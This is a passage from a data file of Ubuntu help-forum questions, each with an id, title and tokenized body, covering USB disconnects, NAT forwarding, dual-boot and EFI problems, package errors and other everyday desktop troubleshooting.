idvendor=11b0 , idproduct=6348 sep 22 14:02:37 xps-l502x kernel : [ 25482.015702 ] usb 3-2.1.2.3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 sep 22 14:02:37 xps-l502x kernel : [ 25482.015708 ] usb 3-2.1.2.3 : product : usb3.0 media reader sep 22 14:02:37 xps-l502x kernel : [ 25482.015713 ] usb 3-2.1.2.3 : manufacturer : kingston sep 22 14:02:37 xps-l502x kernel : [ 25482.015717 ] usb 3-2.1.2.3 : serialnumber : 08735313900604 sep 22 14:02:37 xps-l502x kernel : [ 25482.023351 ] scsi55 : usb-storage 3-2.1.2.3:1.0 sep 22 14:02:37 xps-l502x kernel : [ 25482.094737 ] usb 3-2.1.2.4 : new high-speed usb device number 27 using xhci_hcd sep 22 14:02:37 xps-l502x kernel : [ 25482.114421 ] usb 3-2.1.2.4 : new usb device found , idvendor=04e8 , idproduct=6860 sep 22 14:02:37 xps-l502x kernel : [ 25482.114437 ] usb 3-2.1.2.4 : new usb device strings : mfr=2 , product=3 , serialnumber=4 sep 22 14:02:37 xps-l502x kernel : [ 25482.114446 ] usb 3-2.1.2.4 : product : galaxy nexus sep 22 14:02:37 xps-l502x kernel : [ 25482.114451 ] usb 3-2.1.2.4 : manufacturer : samsung sep 22 14:02:37 xps-l502x kernel : [ 25482.114455 ] usb 3-2.1.2.4 : serialnumber : 0146975a11013006 sep 22 14:02:37 xps-l502x mtp-probe : checking bus 3 , device 25 : `` /sys/devices/pci0000:00/0000:00:1c.3/0000:04:00.0/usb3/3-2/3-2.1/3-2.1.2/3-2.1.2.2 '' sep 22 14:02:37 xps-l502x mtp-probe : checking bus 3 , device 26 : `` /sys/devices/pci0000:00/0000:00:1c.3/0000:04:00.0/usb3/3-2/3-2.1/3-2.1.2/3-2.1.2.3 '' sep 22 14:02:37 xps-l502x mtp-probe : bus : 3 , device : 26 was not an mtp device sep 22 14:02:37 xps-l502x mtp-probe : bus : 3 , device : 25 was not an mtp device sep 22 14:02:37 xps-l502x mtp-probe : checking bus 3 , device 24 : `` /sys/devices/pci0000:00/0000:00:1c.3/0000:04:00.0/usb3/3-2/3-2.1/3-2.1.2/3-2.1.2.1 '' sep 22 14:02:37 xps-l502x mtp-probe : bus : 3 , device : 24 was not an mtp device sep 22 14:02:37 xps-l502x colord : device added : sysfs-samsung-galaxy_nexus sep 22 14:02:38 xps-l502x kernel : [ 25483.040922 ] scsi 55:0:0:0 : direct-access fcr-hs3 -0 1.00 pq : 0 ansi : 4 sep 22 14:02:38 xps-l502x kernel : [ 25483.057615 ] scsi 55:0:0:1 : direct-access fcr-hs3 -1 1.00 pq : 0 ansi : 4 sep 22 14:02:38 xps-l502x kernel : [ 25483.074508 ] scsi 55:0:0:2 : direct-access fcr-hs3 -2 1.00 pq : 0 ansi : 4 sep 22 14:02:38 xps-l502x kernel : [ 25483.091462 ] scsi 55:0:0:3 : direct-access fcr-hs3 -3 1.00 pq : 0 ansi : 4 sep 22 14:02:38 xps-l502x kernel : [ 25483.093043 ] sd 55:0:0:0 : attached scsi generic sg2 type 0 sep 22 14:02:38 xps-l502x kernel : [ 25483.093546 ] sd 55:0:0:1 : attached scsi generic sg3 type 0 sep 22 14:02:38 xps-l502x kernel : [ 25483.093988 ] sd 55:0:0:2 : attached scsi generic sg4 type 0 sep 22 14:02:38 xps-l502x kernel : [ 25483.094593 ] sd 55:0:0:3 : attached scsi generic sg5 type 0 sep 22 14:02:38 xps-l502x kernel : [ 25483.165391 ] sd 55:0:0:0 : [ sdb ] attached scsi removable disk sep 22 14:02:38 xps-l502x kernel : [ 25483.168487 ] sd 55:0:0:1 : [ sdc ] attached scsi removable disk sep 22 14:02:38 xps-l502x kernel : [ 25483.171167 ] sd 55:0:0:2 : [ sdd ] attached scsi removable disk sep 22 14:02:38 xps-l502x kernel : [ 25483.173966 ] sd 55:0:0:3 : [ sde ] attached scsi removable disk this can happen every few minutes , particularly with a galaxy nexus plugged in , though it can occur even without this . for example , it happened just before i wrote this question , and it happened again while writing the question . while the disconnect/reconnect is going on , the mouse freezes , keyboard input is ignored , etc . lsusb -t reports : / : bus 04.port 1 : dev 1 , class=root_hub , driver=xhci_hcd/2p , 5000m / : bus 03.port 1 : dev 1 , class=root_hub , driver=xhci_hcd/2p , 480m |__ port 2 : dev 2 , if 0 , class=hub , driver=hub/4p , 480m |__ port 1 : dev 28 , if 0 , class=hub , driver=hub/4p , 480m |__ port 2 : dev 29 , if 0 , class=hub , driver=hub/7p , 480m |__ port 1 : dev 30 , if 0 , class=hid , driver=usbhid , 1.5m |__ port 2 : dev 31 , if 0 , class=hid , driver=usbhid , 1.5m |__ port 2 : dev 31 , if 1 , class=hid , driver=usbhid , 1.5m |__ port 3 : dev 32 , if 0 , class=stor. , driver=usb-storage , 480m |__ port 4 : dev 33 , if 0 , class=vend. , driver= , 480m |__ port 4 : dev 33 , if 1 , class=vend. , driver=usbfs , 480m / : bus 02.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/8p , 480m |__ port 5 : dev 3 , if 0 , class='binterfaceclass 0xe0 not yet handled ' , driver=btusb , 12m |__ port 5 : dev 3 , if 1 , class='binterfaceclass 0xe0 not yet handled ' , driver=btusb , 12m / : bus 01.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/6p , 480m i have a usb 3.0 hub plugged into a usb port on the notebook , and a usb 2.0 hub plugged into the usb 3.0 hub , and i have a few items ( keyboard , mouse , galaxy nexus ) plugged into the usb 2.0 hub . note that i have already gone in and blocked auto-mounting , as that was driving me nuts as the mtp mount for the galaxy nexus would automatically spring back up . this usb hub and device setup worked fine on an ubuntu 11.10 environment , from a similarly spec 'd l502x , so the hubs and other devices presumably are fine . are there known issues with 13.04 and usb that i should know about ? or is this possibly a problem with the usb port of the l502x that i am using ? or something else ? thanks !
348806	nat forwarding not working	i tried to set up forwarding from eth0 to wlan0 in ubuntu : echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -f iptables -f iptables -t nat -a postrouting -o wlan0 -j masquerade iptables -a forward -i wlan0 -o eth0 -m state -- state related , established -j accept iptables -a forward -i eth0 -o wlan0 -j accept but it does n't work . pinging 10.0.0.1 ( which is the default gateway on wlan0 but not eth0 ) works on wlan0 but not on eth0 . when running ping -ieth0 10.0.0.1 , there is no output from ping , tcpdump -i wlan0 shows nothing , and tcpdump -i eth0 shows dropped icmp packets .
348807	ubuntu wo n't install on my windows 8 system	windows 8 has failed me and i need something better . i 've downloaded ubuntu to an 8 gb usb stick but it wo n't install . what am i doing wrong ?
348812	ubuntu hangs and my monitor turning off and on	i 'm newbie on ubuntu : ) i 've tried to install ubuntu with wubi , after downloading the os it prompts `` reboot now '' after rebooting ubuntu starts to install while installing the mouse cursor appears and hangs and suddenly my monitor turned off and on again and again i cant proceed with the installation i 'm stuck , i 'm in running windows 7 2gb ram,500gb hd , amd-apu 3400..
348814	what version of ubuntu supports installing alongside windows 8 ?	i have a laptop with windows 8 pre-installed . i want to install ubuntu alongside , but the last time i tried , there was 12.04 and it did not recognize windows 8 , and therefore did not let me install alongside it . is this issue fixed for 12.04 ? if not , should i go with 13.04 ? in that case , does 13.04 have any disadvantages over 12.04 ? the laptop seems to support 13.04 better as i 've read on the net . this poster here says that wifi driver works on 13.04 .
348815	how to boot ubuntu 13.04 from windows 8 with a uefi computer ( intel pentium processor )	first of all , i am going to introduce my computer 's identity ( sort of ) : asus sonicmaster 750gb hdd 8gb ram processor : intel pentium ( 1,80ghz of speed ) windows 8 already installed have tryed to boot ubuntu from this computer . so here is my problem : i , one day , decided to dual boot ubuntu 13.04 ( and 12.04 ) with windows 8 so that i could see whether it works or not . it displayed the logo screen of ubuntu and then a terminal showed : ( initramps ) : unable to find a medium containing a live file system . this error is known throughout the ubuntu community . however , i read multiple tutorials telling that i should disable this secure boot ( done ) , change the sata configuration from ide to adhi ( done i think ten times in a row ) . so i am confused . just one thing : i booted one time out of ten , and i was the second time i was trying out these ubuntu distros . so please , can someone help me out ? regards , the drummer from kubuntu
348816	how to access efi boot partition as read-write ?	i have installed ubuntu 13.04 alongside windows 8 ( efi mode ) and now i want to go to a read-write access of the efi boot partition . for secure boot to work , i installed the linux foundation 's preloader . then i enabled root account login to access the efi boot partition . i have copied the boot loader , but now the efi boot partition mounts as read-only . when i try to change the folder permissions , it says : error setting permissions : read-only filesystem i have already tried the following command in root : mount -o remount , rw /folder1/folder2/targetfolder it is still read-only . how to fix this ?
348817	post installation log on	after the initial ubuntu log on logo boots my ubuntu goes into command line mode and gives the error : ( instramfs ) losetup : could not find any free loop device
348820	is universe checked by the ubuntu security team ?	i have a generall question regarding the ubuntu universe repository . does anybody know if they are checked by ubuntu security team ? will they move or delete packages if any problem is encountered especially security problem . thanks for help : ) i just want to know how much trust can i put in programs in universe-repositories . i do install only stuff from main . if a package in the universe will be found as dangerous - will ubuntu team delete it ? thanks
348821	unattended-upgrades verbosity ?	using this topic here , i 've installed unattended-upgrades so that all upgrades are done when i shutdown my ubuntu computer . however , it does not show everything i 'm used to seeing when using apt-get update and upgrade . all i get is that the shutdown has been halted for 5 seconds by unattended . is there some way i can configure the unattended-upgrades to be more verbose ? to print anything and everything that is happening on the screen ? /edward
348828	start skype call from terminal	is there a way to start a skype call from the terminal ? i have found skype4py , but it does n't work on ubuntu 12.04 . is there a solution without downgrading ?
348830	how can i find which applications are installed on my system ?	is it possible to get a list of the applications which have been installed ? i 'm using ubuntu 12.04 .
348836	keep the running processes alive when disconneting the remote connection	i have a bunch of processes on a server initiated by ssh from my own machine . it is now about three hours that my machine 's ubuntu has got hung and i do not see any other options but restart . is there any way to keep the processes on the server alive ? i have the root access to both my machine and server . thanks in advance
348838	check available webcams via command line	is there a terminal command that lists all the webcams connected to my computer , including the native one ? maybe using ffmpeg package ?
348841	sudo apt-get install wine1.7 returns unmet dependencies error	when i `` sudo apt-get install wine1.7 '' i get the following error regarding unmet dependencies http : //paste.ubuntu.com/6142822 . i 'm running lubuntu 13.04 can anyone help me out ? i 'm stumped as for where to start with this . reading package lists ... building dependency tree ... reading state information ... some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . wine1.7 : depends : wine1.7-amd64 ( = 1.7.2-0ubuntu1~ppa1 ) but it is not going to be installed depends : wine1.7-i386 ( = 1.7.2-0ubuntu1~ppa1 )
348843	gnome installation tried rebooting	i tried rebooting with ( sudo reboot ) but it does n't seem to take away the installation notice , and i still ca n't log into the device , could you please please help
348846	function like `` connectify '' on ubuntu	i know there was a lot of questions about this , but my problem is kind of different . i have tablet with android . on windows i used to host wifi from my pc . i used app `` connectify '' . on ubuntu i can use the `` use as hotspot '' option but it hosts `` ad-hoc '' network . android does n't see ad-hoc networks . how can i make a wifi network similar to what connectify did . my pc is connected to internet using a cable and i have external adapter . sorry for my english , and thanks for the help : )
348847	partitioned os lost	i have a computer with dual boot windows and ubuntu . i decided to download updates in ubuntu but in the middle my computer froze so i had to do a hard reset . when i started the computer again i got an error message with an ok option . i clicked it and when i start the computer now all i get is this error message on start . how can i solve my problem ? window failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer ( i do n't have one ) 2 . ... 3 . ... ... file : \ubuntu\winboot\wubildr.mbr status : 0xc000000f info : the selected entry could not be loaded because the application is missing or corrupt . yes , it was a dual boot . the original operating system was w. vista . now it 's w.7 and ubuntu . however , in attempting again to re-install the ubuntu now it looks like i 've lost the partition altogether . however , it is supposed to give me 3 options to install , with the first being to install `` alongside '' . but this option is n't there . i do n't know which ubuntu version was first installed , but looking at the dates of when the programs were written , and knowing when my son-in-law installed it , it should be 13.04 which is the one i 'm trying to install . as to personal files , i do have files on this computer now . i 've been using it for learning or installing this ubuntu situation , and transferring audio files into compatible cd formats , under win7 . i am thinking of just giving up on this idea . it looks to me like ubuntu is just a desktop ( without root directory access ) with openoffice suite and i have oo as well as root directory access . oh yeah , i do n't care for win7 . i like win xp best . btw , i am unable to put properties into the audio .wav file . i downloaded media monkey , because forum folks said this would resolve the problem . but after entering all the information into mm i checked the actual file and the info was not there . after mm asked me if i wanted the information burned onto the cd with the file , it was n't ( actually it asked if i wanted the text files burned for devices that would read that info , such as ipods . i would think my computer would qualify and the info is n't there . ) any thoughts on this ?
348848	language encoding problem in live ubuntu 13.04	i am trying live ubuntu 13.04 cd . one of the things i need to do is copying files from a usb external disk which had been working with a cisco nlsu2 server that broke down , and i can not read the disk in windows xp . when ubuntu 13.04 live cd is running i can access the usb drive , read it ok , as well as the windows internal disks , no problem . when i tried copying the files i had a problem with permissions , which i solved this way : - open a terminal - with the command gksu nautilus i open the graphical environment as root and i am able to copy the files from the usb disk to any internal windows drive in my pc . but ... some files are shown as having invalid encoding , such as those with cedillas , etc . and they are not copied to the internal windows drive . i tried following an advice i 've read by typing in the console the command : sudo apt-get update & & sudo apt-get install convmv but it becomes stuck , so it seems , and nothing happens . can anyone helpt me on this ? thanks in advance !
348851	vmware player 6 no longer boots kubuntu 12.04.3	i have vmware player 6 installed on a 64 bit windows 7 system . i installed 64 bit kubuntu 12.04.3 as a virtual machine and it installed and ran fine . after my most recent restart of the kubuntu however , it no longer loads . it would start up as a black screen and never get to the desktop or a command prompt . i disabled the 3d acceleration graphics , which got me to an odd looking login screen where after putting in my info it would send me to a black screen . trying to start it up again results in a black screen , the login screen no longer shows up . what 's wrong , and how can i fix it ?
348852	install alongside `` them '' ? even though i only have 1 os ? should i move forward ? win7/ubu 12.04	i am at a slight problem right now , and i have searched keywords on this forum , but i do n't find anyone with the exact concern . while trying install 12.04 lts on my machine as a dual boot option , ubuntu still says that i have multiple operating systems on it . it gives me the option to install alongside `` them '' ( as opposed to install alongside windows 7 ) my ntsf reads as sda/1 system 1.46 gib 500 used 999 unused boot , diag sda/2 is c : sda/3 hddrecovery 13 gib total 13.15 used hidden my concern is , do i delete one of these partitions even though they are being used ? do i shrink c : ? or do i just move forward with `` install alongside them '' ?
348853	13.04 gpu not playing nice with youtube	i am having issueswith watching youtube videos on my laptop . my specs are : core 2 duo 2.3ghz nvidia 240m ( old card ) 4gb of ram the problem is that the video looks weird . there is some weird tearing along some corners in the video and the ui is also wrong . in windows it looks fine . i attached a picture if you look at it with a 100 % zoom you can see what i mean better . i am using the 'recommended ' driver from nvidia . also i seem to be getting a bad fps on youtube , 11 fps on average . could it be that the hardware is too old for ubuntu ?
348854	drag and drop option in ubuntu 13.04 not working	i am using ubuntu 13.04 32bit . i have a problem in dragging a file and opening in some application . suppose i have to open a text file , when i try to drag the file to open in gedit , alt+tab vanishes , and i cant open gedit to open the file
348858	wifi does n't work after hibernate but does work after suspend	i run ubuntu 13.10 ( though on 13.04 situation was the same ) on thinkpad e125 laptop i have very common problem - there were no wifi after suspend . i 've googled the problem and find solution that works perfectly - http : //www.webupd8.org/2013/01/fix-wireless-or-wired-network-not.html - after following those recommendation i have probably 100 suspend/wake-up cycles - wifi always worked but this fix did n't affect hibernate - now i have 100 % times not working wifi after hibernate . if after hibernate i go to suspend and back - wifi start working again . can some please advise the way to apply that patch to hibernate
348860	loudness equilization in ubuntu ?	although i have a dual-boot setup , i am using ubuntu most of the time . i sorely miss loudness equalization from windows , and am wondering if there is such an option for ubuntu . how can i get loudness equalization in ubuntu ? i am using pulseaudio for sound ( as far as i am aware ) , and am using ubuntu 12.04 . thanks for any help .
348867	bootmgr is missing [ new hdd ]	i am very new to linux , my old hdd device went to completely destroyed so i purchased a brand new blank hdd installed ubuntu onto it using my new hdd as a usb to a desktop . so when i had tried to boot using my new hdd with ubuntu installed it came up with the error bootmgr is missing . i have tried looking around but since i am not heavily proficient can someone easily explain how to fix this issue .
348869	can command cmp be used to compare a disc and an iso ?	my friend gave me a ubuntu live cd , for security reason i want to make sure the cd is safe to use . i have checked the sha256sum and md5sum of the cd , but then i heard they have vulnerabilities too . i know cmp compares two folders byte by byte . so can i use cmp /dev/cdrom ubuntu.iso to see if the cd is truly identical to the iso i downloaded from ubuntu.com ? is this even better than using sha256sum / md5sum ?
348870	ubuntu 13.04 random lockup - xorg dying , colored squares	i 've installed ubuntu 13.04 on an acer nettop and randomly , ubuntu locks up and the screen looks like this : https : //www.dropbox.com/s/y6t3npxqvbi3zvh/ubuntu_lockup.jpg desperately need help . any advice ? video card is an nvidia ion gt128 .
348876	python script works fine with root but does n't work with sudo	i have a python script that i run as root and it works fine . when i try to run it with another user ( not root ) i use sudo command , but it does n't work . as root , i have typed : /usr/bin/python /somedir/someotherdir/myscript.py `` some parameter '' it works ! as `` a user '' i have typed : sudo /usr/bin/python /somedir/someotherdir/myscript.py `` some parameter '' it does n't works ! ? ! ? ! ? ! python executes all right , but in some place of the script it looks like it can not access some directory or get some library . i have an entry in the /etc/sudoers file like this : '' a user '' all = nopasswd : /usr/bin/python it looks like sudo does n't grant complete root access to `` a user '' to execute /usr/bin/python can you tell me what could be wrong ?
348877	how can i turn off sidebar notifications ?	sorry , i 'm decently new to ubuntu , only about 2 weeks in . still learning how to use ... well , everything . checked around and maybe i 'm phrasing it wrong , but i ca n't seem to find an answer . i have my im client , just using empathy at the moment , and every time i get an im , the sidebar popps out and shakes . i just want it to stop . if i can , i 'd like all the notifications from the sidebar to be turned off . thank you all so much , the forums here have been a great help as i find my way here , using ubuntu .
348878	how to configure apt to access a deb repository over ssh ?	i have a deb repository accessible with ssh ( following instructions from this site ) . i use the ssh-public-key-based authentication to access the repository server . how i can configure apt-get on clients to make it use a private key to connect to the repo ? how to configure apt-get to use ssh-agent ? whenever i call sudo apt-get update on a client machine , i need to provide a password for vagrant user . the source.list on the client machines : deb ssh : //vagrant @ 33.33.33.16 : / precise main update : sudo ssh vagrant @ 33.33.33.16 works after following instructions on making sudo work with ssh-agent . sudo apt-get update does not .
348879	ubuntu installation error	i have no internal hard drive on my computer so i tried installing ubuntu from a live cd to an external hard drive . when i try to boot from the external i get this error : error : file '/grub/i386-pc/normal.mod ' not found how do i fix this ?
348882	can not boot ubuntu from usb 2.0 on os x	i 'm running osx 10.7.5 on a mac mini 2012 . i 'm trying to boot ubuntu , but keep running into issue , after issue . this is what i have done : got an extra external hard drive an formatted to msdos with disk utility mounted the ubuntu .iso using unetbootin ( will not recognize osx extended journaled partitions ) restarted , held down option to change startup disk , but my external hard drive did not show up installed refit to see if it would work restarted , my ubuntu partition showed up , so i tries to boot from it . i got a blackscreen saying `` non-system disk press any key to continue ... '' , which is unresponsive i 've tried remounting the .iso multiple times , no success
348884	why ca n't i install ubuntu 13.04 on unusable partition ?	i am wanting to keep windows 7 , because i am new to ubuntu , but why is it telling me that no root file system is defined ? what can i do to get past this ?
348885	/etc/fstab s3fs not mounting	i am very new to linux and some change i have done to the system now fails to mount an s3 bucket as it used to . the command i have in /etc/fstab is : s3fs # mybucketname /data/webserver/offline fuse allow_other , uid=1000 , gid=1000 0 0 i do n't know how to check for errors but it is not mounted after a reboot . 1000 is user ubuntu . if i try s3fs mybucketname /data/webserver/offline -o allow_other -o uid=1000 -o gid=1000 while logged in as ubuntu user i get the following error : fuse : failed to open mountpoint for reading : permission denied if i sudo mount -a the s3 bucket gets mounted just fine . ls -la /data/webserver of my directory returns : d -- -- -- -- - 2 ubuntu ubuntu 4096 2011-02-11 22:29 offline sorry , i am such a noob and i am sure this is probably easy to resolve but i have been googling since this morning and my eyes are tired . any help would be greatly appreciated .
348887	dash icon does n't work	dash icon does n't work . all other icons in launcher work . tried the above , and got the following : bob @ bob-desktop : ~ $ dconf reset -f /org/compiz/ bob @ bob-desktop : ~ $ unity -- reset-icons & disown [ 1 ] 4054 bob @ bob-desktop : ~ $ compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity ( process:4061 ) : glib-gio-warning ** : g_settings_set_value : value for key 'visual-bell-type ' in schema 'org.gnome.desktop.wm.preferences ' is outside of valid range compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : starting plugin : opengl compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : copytex compiz ( core ) - info : starting plugin : copytex compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell warn 2013-09-22 19:21:59 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.autopilot.introspection ' yet as we do n't have a connection , waiting for it ... warn 2013-09-22 19:21:59 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.debug.logging ' yet as we do n't have a connection , waiting for it ... warn 2013-09-22 19:21:59 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-09-22 19:21:59 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-09-22 19:21:59 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-09-22 19:21:59 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.launcher ' yet as we do n't have a connection , waiting for it ... warn 2013-09-22 19:21:59 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have a connection , waiting for it ... warn 2013-09-22 19:22:00 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have a connection , waiting for it ... compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch view type at /org/ayatana/bamf/window16777221 : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity.glib.dbus.proxy glibdbusproxy.cpp:418 calling method `` canhibernate '' on object path : `` /org/freedesktop/login1 '' failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.login1 was not provided by any .service files error 2013-09-22 19:22:00 unity.session.gnome gnomesessionmanager.cpp:334 logind canhibernate call failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.login1 was not provided by any .service files warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity.glib.dbus.proxy glibdbusproxy.cpp:418 calling method `` cansuspend '' on object path : `` /org/freedesktop/login1 '' failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.login1 was not provided by any .service files error 2013-09-22 19:22:00 unity.session.gnome gnomesessionmanager.cpp:334 logind cansuspend call failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.login1 was not provided by any .service files warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:00 unity < unknown > :0 failed to fetch type : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window16777221 warn 2013-09-22 19:22:40 unity.iconloader iconloader.cpp:280 unable to load icon . gthemedicon application-x-ms-shortcut gnome-mime-application-x-ms-shortcut application-x-generic at size 64 warn 2013-09-22 19:23:28 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application570171121
348888	how do i solve `` error splicing files ? ''	my hard drive crashed , so i 'm using a ubuntu live disk to access my files . but as i try to transfer them to my flash drive , it occasionally comes up with an error message which , when i view details , says : error splicing file : input/output error . how can i fix this ?
348889	ubuntu one logs desktop when clicking on `` enter e-mail address_	upgraded to 13.04 from 12.10 , when i open ubuntu one from applications , the ubuntu one window opens , as soon as i click `` i have a account /sign in '' button , ubuntu immediately logs me off . when i log back on all my applications are closed ? ? i had a similar issue in 12.04 after updating the driver for nvidia 8600m gt from 304 to 317 so , i thought upgrading to 13.04 would resolve the issue however it is still happening . any assistance is appreciated clyde b
348892	hdd monitoring web interface	is there a web based application that i can install in ubuntu 13.10 , that will allow me to monitor my drive 's and their capicity etc ? i 'd like a visual interface rather than having to remember all the commands , and i 'd also rather being able to access this via a web interface , example : www.domain.com:5555 i have tried using monit , although i could n't access the web server , and tried for ages to get it to work..
348893	need help putting ubuntu on a usb it has 2g of free space	need help putting ubuntu on a usb i dont see any options to download ubuntu onto a usb it just says desktop , server , or cloud dont know which one is for usb 's help please thnks
348894	what determines ethernet port name ?	i have two computers which are supposed to be identical hardware . however on one machine , the ethernet port shows up as `` eth1 '' whereas on the other it appears as `` eth2 '' . i am trying to manage an ubuntu image to work on both of these machines , but the /etc/network/interfaces config file needs to be configured differently on each . one solution would be to just put both ethernet port names in the config file . this works , in that it gives me an ethernet connection , but having an incorrect port in the config file causes a long delay ( > 1minute ) in the failsafe boot delay upstart job . is there some way i can let it detect which port to use automatically ?
348895	how do i change my forgotten password in xubuntu ?	how do i reset my forgotten password in xubuntu ?
